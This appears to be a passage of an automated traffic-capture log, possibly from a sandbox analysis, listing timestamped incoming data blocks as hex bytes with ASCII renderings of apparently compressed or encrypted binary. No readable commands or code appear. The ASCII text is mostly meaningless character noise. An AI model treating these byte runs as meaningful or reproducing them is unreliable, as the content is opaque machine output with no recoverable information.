                                                                                                                                                                                2021-10-19 05:23:31 UTC1831INData Raw: 5c bb 4a 6b d3 07 90 88 fd 7c 59 95 d7 03 8a b1 2f b2 22 61 d1 0f c8 0a 5e 16 89 cd 59 ae cb fa 4b a4 b4 68 27 28 57 56 a0 ec 76 bd 09 65 59 6f 7d 57 67 cf 2d 76 e2 49 5c c0 52 5c e8 64 29 be e8 85 4d 7e b4 bb a3 ff f5 bf 3b 06 d3 bb 28 71 52 06 ba b5 fc 9d 4d 96 03 24 19 bf 1f f7 da c1 ea 23 c8 a2 92 bf e2 62 64 71 95 54 d6 74 94 9f f9 70 e6 07 30 15 05 ee 8a 88 3b aa df ec 3c c0 5f cc 72 ee b3 2d 22 b6 0f b6 05 39 a7 f0 ad 78 f8 08 3e 4d fa 72 f8 1f 97 50 8a 0c f5 49 6c e3 88 3e e0 4e 62 33 58 da 84 57 71 80 43 ce 78 e7 c4 64 5a 8c c1 e6 02 6a 28 8e af 7c 20 88 7f db 06 a7 7b 3b 23 e2 6a b8 ff 5f 57 e8 f8 8b ec f4 92 2f de f8 67 e9 a1 4f fb ff d5 cd 61 b3 84 0a e8 27 f9 0b 58 f6 1a 27 d1 97 7a 57 7c bd 5e a0 7c 8f 47 fa e9 2f 3f 11 70 05 19 8c 74 f5 85
                                                                                                                                                                                Data Ascii: \Jk|Y/"a^YKh'(WVveYo}Wg-vI\R\d)M~;(qRM$#bdqTtp0;<_r-"9x>MrPIl>Nb3XWqCxdZj(| {;#j_W/gOa'X'zW|^|G/?pt
                                                                                                                                                                                2021-10-19 05:23:31 UTC1847INData Raw: 7f 94 66 50 dc c0 65 62 d5 10 8e 08 82 aa 7d d4 4d 0c 0d 1e c4 a0 48 0c 4e 30 66 0c 29 be b4 f0 58 2d fa 13 48 a2 00 1a b2 5e 2e 9c 36 3e 3c 66 17 aa f8 20 40 1a 4b 21 48 91 ea 00 bd d9 d4 33 2a ab 86 01 8e 5b 37 8a 6c ba 72 70 9a 7c 40 68 59 50 91 9c 43 e4 c4 f6 b4 04 38 73 6d 5d 45 eb e3 48 8d 31 fe 6a b9 f8 4b ae 28 67 57 9f 5c 33 eb f7 e6 c2 97 52 58 09 de be b0 49 7f 16 36 9d 40 00 de 6e 5b 2d fe 37 3e 81 e6 44 1f 9e 6f 52 5f 6e 04 9e 5d 5a bf 9d 1e 3a 8b 37 df e7 df 18 d9 31 56 25 aa 1d d7 1e 17 bf dc 9f e9 57 51 0e eb 7d 65 c3 b6 75 82 b7 f6 27 fe b7 76 4d 74 9d d4 9e 7a 7f f9 23 49 86 4a b3 1e ad 64 0d 71 6a 42 48 64 d9 1e 86 7d dd 2d 09 58 00 be 3e 4a 7c 04 c0 28 5e f1 21 63 7e 07 f8 ac 7a 0f 85 64 86 c0 2b e9 b0 2c 98 0b c8 16 73 44 36 e0 66 0a
                                                                                                                                                                                Data Ascii: fPeb}MHN0f)X-H^.6><f @K!H3*[7lrp|@hYPC8sm]EH1jK(gW\3RXI6@n[-7>DoR_n]Z:71V%WQ}eu'vMtz#IJdqjBHd}-X>J|(^!c~zd+,sD6f
                                                                                                                                                                                2021-10-19 05:23:31 UTC1863INData Raw: 84 1c 9d ab f5 32 73 28 00 9b fd ec e8 06 d2 5e 74 0e b1 fc 64 18 a5 1f 12 80 29 29 77 94 07 10 a5 98 23 0b b0 b9 c4 d4 8a 00 cc e8 a2 ce 8f f9 bd f5 b0 c5 07 15 a9 ba bc 78 c0 a6 c4 30 37 00 10 bf 4b 6a 02 70 a3 a7 00 d7 73 fe df 9a 48 14 19 3e 97 5f 83 1f c3 b7 d5 74 f0 0c 1e 4b 3e 39 d9 80 d4 57 fb ba 96 b1 ed 00 dc 54 3e 02 99 c7 44 6b 07 3a 39 9f e4 75 b0 11 58 20 19 00 ea d2 17 51 bc 30 82 4e 24 fc f8 12 00 eb e3 ba f3 b9 10 3d 4f 36 80 b1 58 52 d1 6d 72 a7 05 6a 85 22 b4 4c 00 de 5e b7 b5 c6 8b 07 8f 27 9e 39 78 40 4e 37 18 1e 00 ec fc 66 26 bf 16 32 d9 00 d4 db cc 8c cf 8d 60 b7 00 02 23 9a 6f be 1f 01 73 0f 28 cd 80 13 ef de 60 b0 14 07 69 a2 00 c0 b1 2d e2 a6 63 2b 81 07 0b 75 57 b9 f3 60 4d 0e 33 5c 3a c7 d4 38 fb 8c c4 cb 05 ac 74 00 d7 43 8d
                                                                                                                                                                                Data Ascii: 2s(^td))w#x07KjpsH>_tK>9WT>Dk:9uX Q0N$=O6XRmrj"L^'9x@N7f&2`#os(`i-c+uW`M3\:8tC
                                                                                                                                                                                2021-10-19 05:23:31 UTC1879INData Raw: 42 dd d8 d1 92 1a 00 57 24 03 b7 3a 9d cc 89 00 63 17 7b 0f 0b 5a fd d0 3f 32 e8 9f 48 19 c0 66 30 63 50 28 2b e8 8d 00 f2 72 74 3b be 3e 83 43 e8 34 2d 7b f7 50 fb 00 e9 45 79 18 c1 32 dd 60 e8 0b 00 bc 63 07 96 1f 6a fc a4 3c 03 e3 01 ad d5 ca b7 c8 52 d4 51 0e 00 50 b3 21 e0 dc 0a 79 81 00 9e 9a 0b 6d d1 64 ee c1 00 e3 e7 d9 f8 c6 dd 6e c2 00 67 f2 e5 b0 04 56 1b ef 00 fa 60 e9 6d b2 cd 5d 0b 00 44 20 34 7c 54 ac cf 51 00 67 71 f9 32 92 2f c3 55 00 0f 24 9f 7c 20 c1 01 9e 57 b7 08 80 ad 9a d4 4e 89 01 e9 98 0b 05 d7 55 68 d0 f1 97 02 9b 63 2f d5 1b c8 40 07 73 1e 07 f0 6d 93 55 b5 40 7d 57 fc e0 0f 30 83 ad 9c 00 90 95 9e e4 7f e8 89 00 92 e8 31 fb f0 2d a7 aa 00 a9 ed 6c d4 03 36 0c ba 00 40 34 44 db 79 ae 21 b5 00 f3 aa ab 3f 12 52 91 c3 00 9d 31 b0
                                                                                                                                                                                Data Ascii: BW$:c{Z?2Hf0cP(+rt;>C4-{PEy2`cj<RQP!ymdngV`m]D 4|TQgq2/U$| WNUhc/@smU@}W01-l6@4Dy!?R1
                                                                                                                                                                                2021-10-19 05:23:31 UTC1895INData Raw: 2c 94 d3 f4 1a 0f a2 b0 52 ee 7d 80 18 5b b3 64 72 87 00 62 8e 67 55 99 be ed 3e 78 30 00 ba f4 c5 38 56 8d 5d 7c 7c 0f 1f b6 ef cd 47 86 2e 20 32 55 5e c0 64 3a d1 01 d6 24 aa e9 9e da 68 d4 71 a5 4c c4 a8 a0 2a b0 31 04 3d c2 ed 36 9b 2a 00 b8 9b c2 58 e4 08 ba a0 9f 80 8e 00 fa b3 b9 7d a2 ce c4 7e 00 b6 25 81 46 e9 49 97 4e 00 94 5d e5 5f 6e ed 20 30 04 4c d4 34 54 c7 9a d0 80 ce fd 7f 96 28 00 37 41 67 df 66 9d f1 c7 00 39 0f 0d 8e 07 34 42 ae 00 ce 7e 5f 09 02 e7 f4 65 00 80 4f 1f ba 0c b0 10 92 00 d2 73 58 eb dd fa 6a ee 74 2c 01 19 ac c1 7e 33 57 8a f8 67 09 00 78 04 b7 1f 80 e4 42 32 0e e5 aa 60 ff 82 7c 2a 56 80 bf 72 61 40 87 72 5a 00 3b ed a3 13 f9 f5 35 71 01 88 25 2c bd e4 f2 75 6b 9f a0 00 45 9d a4 57 65 2a b4 7c f9 e6 34 00 d1 af c5 b1 b3
                                                                                                                                                                                Data Ascii: ,R}[drbgU>x08V]||G. 2U^d:$hqL*1=6*X}~%FIN]_n 0L4T(7Agf94B~_eOsXjt,~3WgxB2`|*Vra@rZ;5q%,ukEWe*|4
                                                                                                                                                                                2021-10-19 05:23:31 UTC1911INData Raw: 61 a5 42 00 60 b8 44 fb 1a 2a 37 f5 f0 31 00 71 a3 e9 56 8e 7e 85 38 00 eb a4 0c 2a 16 a0 ba 0a 00 18 42 b8 29 c7 57 53 7c 00 4f 59 7b bc 22 8f a8 28 f0 42 39 0b 55 80 c9 cf 68 dd 83 f1 01 00 75 1e e0 81 7f f8 39 6a 1d 33 c9 89 6e cb 01 37 f1 2a 6c 83 70 5d 80 60 06 ce b7 5f 9d 3e 00 2f 5c d8 04 fd 8d 44 eb 7b 87 00 6d 56 6e d2 ae a6 21 31 f4 4e fc 0c 09 47 e2 52 64 80 ed 66 7d b4 af 00 75 3f 58 aa 72 1a fc c0 00 70 9b 23 f3 ca e2 71 f4 f6 a5 00 6c 09 98 41 b8 7f ad 8c 00 39 c6 ae 94 3f c2 e2 9f 00 a5 a7 71 77 5c 03 ca 3a 00 3c 01 e9 2c 79 d6 9a 87 00 65 5a 54 55 64 d2 ed ba 00 f7 15 45 99 aa 77 71 b4 00 95 a2 a0 65 8a 16 23 dd b8 1b 01 e7 84 7c 32 9d 62 0e e0 95 f3 00 10 b4 a3 af 0f 92 e6 4e 00 4a 04 d1 fb 78 c1 c7 b2 03 32 9e 55 aa a1 1b 80 16 8e 63 00
                                                                                                                                                                                Data Ascii: aB`D*71qV~8*B)WS|OY{"(B9Uhu9j3n7*lp]`_>/\D{mVn!1NGRdf}u?Xrp#qlA9?qw\:<,yeZTUdEwqe#|2bNJx2Uc
                                                                                                                                                                                2021-10-19 05:23:31 UTC1927INData Raw: 0e 07 00 eb c4 7c 1d b9 38 80 cb 00 fb b1 ea 99 6c 6a 9e 69 00 71 76 e3 36 ad 90 3a 68 00 0f bf 0d 3f af 6d 5e 2a 00 97 08 3b 34 41 1b 4d c7 00 80 86 93 8a 85 bb 15 11 7c 89 00 66 fd ff f2 ca 72 28 a6 00 a0 38 d7 62 6a 96 16 c2 00 17 80 ee 83 8d fb 78 69 00 30 e8 9e 2a 04 be ad 4b 00 5e ef 14 c9 25 d5 33 5c 01 e0 93 3b b4 bc a8 62 c0 52 81 38 70 72 00 68 c1 42 df ac 55 af 0e a5 91 1b 9e 20 cc 29 c9 85 f4 98 3a 9d ce 50 00 ea d4 fe f2 10 ae 7d 38 00 03 a3 1c eb c0 e8 09 37 00 86 73 ef 56 4f 4a e9 74 03 95 b4 f3 18 3a 51 df c0 bd 5a 76 b6 00 6f 01 b3 1e 2f 96 ac 8a 00 28 e9 dd d9 25 39 53 30 09 93 4d 42 a2 75 4c a0 1e 41 bf 55 43 21 43 c3 85 e9 a6 03 d0 b8 9b 3b c6 fd 00 36 2c 06 7c c1 4e 53 3c 35 89 07 ae 92 9e ff b3 d5 3c d8 94 7d 62 ee 59 00 13 44 ba eb
                                                                                                                                                                                Data Ascii: |8ljiqv6:h?m^*;4AM|fr(8bjxi0*K^%3\;bR8prhBU ):P}87sVOJt:QZvo/(%9S0MBuLAUC!C;6,|NS<5<}bYD
                                                                                                                                                                                2021-10-19 05:23:31 UTC1943INData Raw: 40 74 19 75 03 af ef 97 6b 5e b4 c0 ec e0 b5 0e e2 c9 43 dc a0 ca d8 e3 10 a9 00 3e ac e6 f3 08 1f 3b 7d 00 0d 86 3c af ce 96 a3 1e f4 d0 00 ba 84 75 53 18 6d c3 b9 f7 f8 2e 29 00 fe 94 ae 2f 5e f6 88 af 00 ba 6d c9 92 f2 49 01 9a 00 3b 82 4d 4e e2 ed db bc 00 bf d3 35 b0 0a 52 89 24 98 5e 00 92 93 d5 67 13 3a cf b9 00 ac 0c f6 c7 a7 06 1f be 00 c9 e1 2b eb 16 56 e0 fe 00 1b 14 05 e7 bd d6 bf 9c 00 92 70 13 c9 be 86 7d d9 39 f7 b3 00 1a fa 12 f1 44 e5 af 01 2c 7c c6 0c 5f f9 0d 40 ab 39 24 8c 0f 51 2a bf 27 20 35 30 3f b3 a6 27 3e 81 b8 f0 e0 18 03 3a 57 1e 7f e5 8a a8 a2 fb 09 03 62 6f 0f 5e 08 34 98 11 14 8c 07 d5 9c 60 bd 1a 80 26 c8 7d 42 00 7c c3 1d 6b 14 fa 2b dd 38 91 d5 80 ea 77 58 1b 21 7a 34 00 64 3d 94 90 c4 2a f4 76 3f 70 4f 0e 78 14 b2 a0 ed
                                                                                                                                                                                Data Ascii: @tuk^C>;}<uSm.)/^mI;MN5R$^g:+Vp}9D,|_@9$Q*' 50?'>:Wbo^4`&}B|k+8wX!z4d=*v?pOx
                                                                                                                                                                                2021-10-19 05:23:31 UTC1959INData Raw: 4f 66 01 1a ec 87 60 67 6d e4 e8 59 04 00 48 a4 36 ac 1b 31 24 72 3d 3c 99 80 c1 db 95 df 5a 51 2c 00 40 c0 e4 31 b5 73 0b 36 00 02 39 78 a2 b7 27 d5 42 79 6c 00 09 e2 c3 83 e8 a8 28 a6 02 22 62 dc ef f8 f5 5f ce 00 00 6e 08 e1 fb f6 2d 6f c3 00 bf 1e 8a 43 42 d8 ae c8 00 98 ca 17 5e 70 9a 90 a6 0f 72 cf ee 6f 80 a2 81 a3 35 0b 00 e2 d3 3f b9 66 c6 f0 d9 07 16 2a 33 9b dc a0 9e 0e 21 71 3e 1a 08 01 5a 8e c7 c4 36 fa 70 50 be 1d 17 e4 72 df 15 03 dd 53 4f 86 e8 f9 14 2f 02 c2 99 b5 62 d5 27 77 00 a3 cc 29 e6 bb 00 5a cd c4 d8 f1 35 2f 7f 72 fc 38 0f a2 00 2d 83 26 5c ae 99 d6 00 14 ee 04 1f ad 93 5e d5 09 f3 3c f2 6c 63 3c c0 85 12 fd 7a 46 00 5c 5a 0e 96 cd 8a 72 b2 00 e9 24 1c 39 a3 92 1b 89 00 98 e2 58 75 40 dc 2b 31 0e 5c 2f ee cb cf dd 80 57 a4 17 9a
                                                                                                                                                                                Data Ascii: Of`gmYH61$r=<ZQ,@1s69x'Byl("b_n-oCB^pro5?f*3!q>Z6pPrSO/b'w)Z5/r8-&\^<lc<zF\Zr$9Xu@+1\/W
                                                                                                                                                                                2021-10-19 05:23:31 UTC1975INData Raw: 23 f2 07 17 86 b4 12 68 40 a7 a4 89 91 00 ea 3e ee 90 87 d5 1b 4b 00 0e 4f 22 39 48 b0 9a e2 00 5f dc 26 a3 b2 84 db d7 00 5c 24 bc de cb 4e 3c e7 00 a1 92 74 8a 59 36 b2 c4 00 a8 fd b1 86 82 9a 32 e3 1f 52 51 74 84 bb 90 0c c1 45 2d f8 d4 3d 4d 00 75 d8 c2 e7 4f 1c ae e0 00 0d 89 0f 06 d7 b9 36 04 00 ce 93 98 52 18 bf 92 9d ea ad 1d 1f 97 8a c0 c1 0d c4 9c 59 ff 3f 3a cb 1c 6a 2d 42 d3 d9 db ae 45 18 2d 7f b0 e8 7a 9d 03 d8 5c 20 c4 6c 7f b8 62 99 1e bf d8 31 00 ea 5d a1 f6 03 8f 0a 7d 00 15 e7 30 54 9e 5c f2 da 07 12 cb 20 22 ef f0 b7 a5 96 e6 0a 7e fd f3 39 cb 80 6d 9c c5 55 05 75 1c 1e c2 ba 38 00 8f f5 7e 0c ad d2 ef 5e e4 80 4c 05 17 f2 00 e2 93 d5 9e dd 8e 38 c7 00 56 04 79 22 09 14 ae e1 4c 27 1e 00 de d8 39 d2 72 41 87 00 5e a3 36 70 8e 62 04 f5
                                                                                                                                                                                Data Ascii: #h@>KO"9H_&\$N<tY62RQtE-=MuO6RY?:j-BE-z\ lb1]}0T\ "~9mUu8~^L8Vy"L'9rA^6pb
                                                                                                                                                                                2021-10-19 05:23:31 UTC1991INData Raw: 65 c3 00 2a 1b ac fb 7b de 4c e2 7d a5 00 88 70 67 ca 93 f1 be b3 76 41 05 01 89 da 11 2d c7 e6 40 f0 c4 61 ed 00 57 52 d9 77 49 ac e9 43 00 7b c3 75 f4 10 3f 80 95 75 99 00 3a d4 86 aa 89 57 ff 01 00 62 25 1a 33 61 7c 4d 3d 0e bf 36 81 43 af 87 60 45 aa 42 df 1b 00 dc d3 5e a7 09 7e 57 62 01 04 d5 0e 08 b7 e8 ff f4 b8 80 90 e1 f4 06 00 cf 96 ae f9 02 03 8f 3f 00 71 7d b8 95 b0 f8 63 16 00 e0 ab f4 69 4b 2b c0 52 03 13 bc 6f dd cc 60 a8 fd 61 11 07 42 34 95 ee 40 c5 e7 c1 17 1b 70 80 18 98 27 b3 d5 41 a9 01 99 4a 3c 35 fe 96 8c 40 8b f9 18 80 0f 97 a5 2f 03 e0 de 62 b9 ad c4 00 9a c2 04 8e eb db 51 e7 00 3a 93 96 78 33 81 16 2f 00 a4 53 84 ee 8b 27 36 f0 3b 08 9a 80 91 13 82 a2 38 e0 0a b0 9a 0f 35 c6 16 bc 80 61 18 4e 92 8a 78 ab 0f d9 6b ef ce 20 5b 0e
                                                                                                                                                                                Data Ascii: e*{L}pgvA-@aWRwIC{u?u:Wb%3a|M=6C`EB^~Wb?q}ciK+Ro`aB4@p'AJ<5@/bQ:x3/S'6;85aNxk [
                                                                                                                                                                                2021-10-19 05:23:31 UTC2007INData Raw: e5 0f 43 ee be 4a 00 6f 50 b1 2b 23 88 09 92 bf cf 77 07 a5 58 61 4e 31 df f0 25 e9 07 15 7f c2 80 53 f5 98 60 10 60 5e 9b 05 21 6b a4 f9 80 80 90 ef f5 5d 3f 8d e2 3c 72 00 c9 d0 3f af 16 83 9b 1c a5 f8 85 c0 34 d9 15 30 1a 72 2e 8e 87 cf 00 51 4a de 5d 8b b1 15 43 3e f0 18 e0 81 79 b1 00 1e 89 fa 74 be 50 2a c1 00 f4 a1 72 98 fc ef 6b a9 e8 27 07 b7 65 f1 ca 41 07 ad c0 2d 3f 88 05 0b 80 fb d6 e3 07 83 9f 63 93 6f a8 0f 8d 8b b0 6d f1 ec 22 d3 07 3a ef 5c 2d 60 10 bd 01 98 75 3e 3f 87 80 0a 35 0f 22 1f 65 a7 00 ad 4c f1 bd 49 5c 6d 71 01 b0 a6 e7 56 b2 5a fe f8 34 16 05 10 fc 3c 8f 94 ee 9c 18 9f e4 1f 00 68 23 19 10 d1 e0 36 cc 0e be 87 85 6d a0 44 b4 4f 41 f4 76 6e 00 05 0a 5a 9d fc be 23 f2 00 ed f6 3b 69 8b ff c8 16 00 46 37 30 e2 b0 39 f4 67 00 11
                                                                                                                                                                                Data Ascii: CJoP+#wXaN1%S``^!k]?<r?40r.QJ]C>ytP*rk'eA-?com":\-`u>?5"eLI\mqVZ4<h#6mDOAvnZ#;iF709g
                                                                                                                                                                                2021-10-19 05:23:31 UTC2023INData Raw: e1 b5 d0 4c 68 44 20 3e f6 1c 77 91 05 ac 50 03 25 89 0e e9 03 18 b2 d6 a9 27 47 02 4e 68 aa 44 d0 6d 68 0b 52 ba 4e 37 a8 bb b2 5a 75 4d b6 2a 64 a9 dd 14 20 d2 b8 26 58 bf 2f 90 44 78 b7 e3 1f fc c6 65 2c 82 20 45 6f a5 56 80 c7 ef cb 7c 1d c0 68 4e 7a fa 69 08 7d 5d b8 2e 83 ed 95 f9 2f e9 75 9e ba 0f 56 be 36 81 c3 6b f7 d6 77 04 07 f6 01 2d 9f 7c d0 ee 33 ac 60 7a 17 25 f2 5e 5c 6a 25 7e 84 7a 5f ec bb b7 cd 06 49 29 36 ab 0e 7c 75 61 01 d1 5a 2b f2 4b d6 e9 bd 92 c4 b0 9a 50 4b b8 61 b3 e9 82 f6 41 2a 40 d8 e2 cf 96 00 89 84 02 00 0a fb 35 6a 4f 26 34 33 f6 00 e8 3a db da ff e9 3d a3 ab 75 f4 78 30 92 df 14 6e 4f fa ce 51 6f d0 84 f4 2a 00 39 1b d0 cf 6a e1 3c a5 9d d5 ff 07 4e ed ae 19 e6 6c 40 89 3e b0 e6 b0 7e f9 ff 70 d3 27 f2 10 09 2a be 80 55
                                                                                                                                                                                Data Ascii: LhD >wP%'GNhDmhRN7ZuM*d &X/Dxe, EoV|hNzi}]./uV6kw-|3`z%^\j%~z_I)6|uaZ+KPKaA*@5jO&43:=ux0nOQo*9j<Nl@>~p'*U
                                                                                                                                                                                2021-10-19 05:23:31 UTC2039INData Raw: 5c 52 04 ae a5 44 4d 16 15 ba 14 a0 1a e0 03 d1 2d 5e b1 39 dd e1 d0 f5 81 7c 28 d2 91 9e af 3f e0 db 98 27 72 02 d1 50 43 24 35 e4 4f f7 96 b9 98 b1 70 e8 7f 8c 40 2d 01 9f b2 d6 4b 24 c5 50 8f e8 aa 3a 64 77 b1 ab c1 5a e6 ff c6 24 1f fb 80 24 e7 9b 98 00 a4 14 e2 aa 74 b4 cd d9 e3 36 31 85 aa f5 e8 dc f2 a7 dd cf 38 0b 92 f5 dc c8 fa fd 82 c2 ba 48 92 e7 22 f9 65 49 10 cc e9 5f f3 8b 31 4a a2 5a a5 ef 01 52 38 c9 5b 05 72 1a 95 c1 8b 56 51 20 d2 6a 48 57 94 72 95 45 e7 a5 f3 31 16 f2 09 d1 14 5e 00 c4 04 ef b2 e7 f2 54 7d 65 99 6b 5b 28 ad 59 68 7a 57 b8 4d 68 a8 12 a0 b0 20 ff 23 cb de 91 b7 2b 0a 12 58 53 ab 2d de 89 ba 54 5e d4 7e f2 dc 24 6b 5a 63 14 55 bd 01 24 1d ee 5d d2 f0 8d c1 17 71 52 29 1c f8 78 70 b6 9d 5c ea e3 ce ed 4b 5e 42 ef 57 75 7a
                                                                                                                                                                                Data Ascii: \RDM-^9|(?'rPC$5Op@-K$P:dwZ$$t618H"eI_1JZR8[rVQ jHWrE1^T}ek[(YhzWMh #+XS-T^~$kZcU$]qR)xp\K^BWuz
                                                                                                                                                                                2021-10-19 05:23:31 UTC2055INData Raw: 19 e2 73 56 b0 e1 86 f0 18 5d 71 49 e2 7d 90 06 54 51 29 cd 59 70 b5 5e 8a da 71 a4 40 53 bb 97 0e 00 d2 1f 81 c3 3d 0a ef 7d 17 c1 e3 01 b0 c8 eb 3d 53 ce 25 c4 d4 3d 25 f7 9c 53 b6 20 2d 7e ae 7e 9d 51 ee 2d 52 58 b0 32 09 60 29 4d 67 63 fb 98 e7 08 f7 5d df 66 09 b0 94 a6 c2 32 9c 48 9b 60 b4 60 b8 83 a9 6a f2 c2 c1 e9 f1 83 fa f7 a9 a8 65 fa 75 d1 ac 12 c6 ba e2 8a 97 ad 90 00 97 fb 0b c3 40 0d 11 30 08 18 29 7e 55 a4 5a e6 ae 06 6a 4c 8d 18 09 1d 1c eb 39 77 53 86 08 38 55 18 ea 77 2c fc 00 49 c2 71 0d 85 f4 8f cb c1 18 50 0c 95 04 e5 02 d4 86 9e 3e 24 f9 80 25 9d c7 96 cc 5c ca 13 23 03 4b ff 2c 70 c0 5e ea a3 97 4b ea 0b 86 36 58 47 60 3a 09 8c 65 45 0c 75 fe bf 7b 18 49 d6 d8 27 fc c8 82 3f a5 b7 44 75 6e 54 0c 4b f6 09 91 78 72 3e 44 47 f8 40 8f
                                                                                                                                                                                Data Ascii: sV]qI}TQ)Yp^q@S=}=S%=%S -~~Q-RX2`)Mgc]f2H``jeu@0)~UZjL9wS8Uw,IqP>$%\#K,p^K6XG`:eEu{I'?DunTKxr>DG@
                                                                                                                                                                                2021-10-19 05:23:31 UTC2071INData Raw: ac eb 2c ab b0 42 68 96 8f 64 1a 69 39 14 d2 64 12 e9 60 52 a9 e0 a1 59 04 85 0b 9d e0 ec 20 14 66 c7 07 40 2e 01 60 4a c4 70 b9 6c 3e 90 e3 62 5e 96 5b 25 fe 2a a5 f9 7f 61 67 57 09 2e cf 73 08 e1 aa 65 00 60 2e 5e d6 54 ed 50 92 8d 7a a2 ac 55 4e 78 5e 3d c4 2f c1 fa 07 94 9f 0c 56 08 b0 6d 05 c4 54 75 80 6c ca d0 23 38 10 99 5a fd 3c 83 3f a5 e7 e4 ef dd e7 7a b2 60 c3 72 af 01 84 60 dd e7 90 05 c1 c6 23 6f 21 ba dc 7a 05 f8 04 94 78 25 59 33 83 6c 84 0c 5f 01 18 85 9b 02 b4 c2 5a 8e 90 15 da 11 04 f3 be b1 4c ff 04 2e 55 3c 22 a1 01 5d 17 01 10 92 f7 0c 89 ec d4 d2 ca 28 a8 47 0a 3d 17 d3 81 9e fc 79 66 3f ea 7e 00 64 51 dc bd da ac 4b 14 49 f0 04 a2 13 3b d7 5f e4 f3 04 68 cd b7 d3 30 d9 a4 7a 88 dd ad f6 7f 0d 3a 81 f1 a9 0d 7a 85 e3 ff a7 b3 4b af
                                                                                                                                                                                Data Ascii: ,Bhdi9d`RY f@.`Jpl>b^[%*agW.se`.^TPzUNx^=/VmTul#8Z<?z`r`#o!zx%Y3l_ZL.U<"](G=yf?~dQKI;_h0z:zK
                                                                                                                                                                                2021-10-19 05:23:31 UTC2087INData Raw: f5 09 a5 5f e7 c5 0a b1 18 b6 c9 d7 96 e3 ee 58 e1 3f 8f 41 0c 27 2c c3 a0 7b 4a a5 ba 38 53 fa 5e d3 f2 76 18 15 f7 1e fe ce fc 11 38 3a 02 7d f1 6e 3c bd 27 5b 1f 05 a5 cc 03 e9 61 85 86 31 00 a6 13 d4 91 0a b5 5a 17 ae 60 20 e6 23 9e 60 08 18 47 3a 6c 35 3c b3 5a 49 96 00 c4 db 30 d8 b5 14 bc 9c 06 07 96 d9 7d 70 e9 17 da d4 06 8b 20 02 0a 0c 9d 4b 5c bb d2 2f ad f0 23 00 63 d1 58 9c e8 3b 66 e7 00 f7 bc f8 91 ce 1c fa ab 0b 60 da 68 fc 34 b2 38 d8 0b 5f fb 6b e3 1c ea b1 23 e1 31 5c 03 38 2a 09 c9 b0 e8 81 80 44 d7 4f 47 6c 90 9c 5d bc d6 12 4a 57 60 20 1c 7a 38 f9 2a 32 a0 b8 00 33 83 3a cc 46 84 bb 22 02 91 be 47 24 1d f1 5f 25 69 f3 eb 02 8d 54 87 c5 d4 bf 3c 93 9d bf b0 81 17 30 69 58 8e fc 4d 31 18 d5 8b df 26 0c d2 bf e5 ed 85 35 2e a5 ae 30 d3
                                                                                                                                                                                Data Ascii: _X?A',{J8S^v8:}n<'[a1Z` #`G:l5<ZI0}p K\/#cX;f`h48_k#1\8*DOGl]JW` z8*23:F"G$_%iT<0iXM1&5.0
                                                                                                                                                                                2021-10-19 05:23:31 UTC2103INData Raw: 24 76 ab 67 b0 f3 b0 b1 18 e6 77 4b 1a e4 2d 2d c9 6f 59 fc 69 f0 f6 97 ef 98 11 af 5a 16 25 bf 8a 29 97 ed 37 04 68 be ba 3b af f9 fb 5a f9 dc dc e1 a2 47 95 f6 b9 76 39 68 ef 13 fa 40 bb f6 b5 88 45 b4 4f 80 45 bf 35 f7 01 7f c1 e6 08 81 ee fc ef 49 14 47 4e ae 39 b7 2f a8 e0 5a de 6c 48 7e 03 6e f2 2d 3f 4d 8f e0 e5 1b fd fb f1 db 1f 5a f0 29 ad fd b1 c0 ac ba a9 bc 98 db b4 db eb b7 58 6e 9f 6e f9 27 f2 d2 76 23 59 8b 14 f9 eb 5e ec ac f3 72 09 29 14 8e f9 f7 59 4d e2 de 54 03 f4 8d 4b 28 a8 51 d2 da 50 10 15 ff f1 a3 8c 1e 4c f6 4a bb 79 31 2f e2 65 c4 a8 0c 01 c5 85 bb ed 05 fa 68 41 fd 8c 39 d2 f5 20 82 17 50 0b a5 af 02 46 b3 22 cd 54 64 44 a7 b0 0e 69 14 23 d9 45 c0 4b ee 89 4e 20 dc 81 aa d8 41 dc 78 14 81 a2 31 07 9d d8 55 8c 9c 74 80 f1 60 69
                                                                                                                                                                                Data Ascii: $vgwK--oYiZ%)7h;ZGv9h@EOE5IGN9/ZlH~n-?MZ)Xnn'v#Y^r)YMTK(QPLJy1/ehA9 PF"TdDi#EKN Ax1Ut`i
                                                                                                                                                                                2021-10-19 05:23:31 UTC2119INData Raw: ad f9 2b 31 64 bd c1 2f cb d6 73 3e 85 f7 2f 87 b0 2e 6b 1b a4 fc 7c b4 d0 3c fc 10 26 2c 00 7c 97 a0 9b d2 09 43 4c db 4b 06 48 56 ff 5c dc 09 9c b6 fe 22 f0 e7 52 29 c1 40 a2 ff 17 28 7b 0f 1e 87 ae af 67 1c 12 7d 8f d8 fa 09 e9 7a 95 f7 9a 2c 5d d9 4c 80 81 ee a9 69 63 4f 98 72 09 ac ae ff 2f 78 6f 98 57 b0 0e 83 0b 41 0c 17 00 fa 06 3b f9 95 1c 64 3e 1c f5 c7 00 bc 2b 4c 5b 85 22 f0 27 78 f7 7d e6 59 5f 17 c9 71 7f a1 85 2e a0 4a 81 71 ce 50 25 a0 0e 0e 1c b8 fb 4e 61 69 d1 6d 6c 87 78 18 e7 cd 11 2f 48 3e c0 2c db c6 30 9a cf 08 00 97 d3 f4 bd 84 7e 15 65 05 90 d7 08 b9 9f 89 dd 89 13 85 b0 11 be 24 38 2d 18 6a 8f ac 0d eb 01 c9 97 99 46 e3 76 9e 00 23 21 df 60 e1 2a 9d 1c c5 75 00 10 05 83 84 bc 8f 7b e8 7b f5 60 a7 2e 0e 42 39 b8 04 ae 49 fa f4 90
                                                                                                                                                                                Data Ascii: +1d/s>/.k|<&,|CLKHV\"R)@({g}z,]LicOr/xoWA;d>+L["'x}Y_q.JqP%Naimlx/H>,0~e$8-jFv#!`*u{{`.B9I
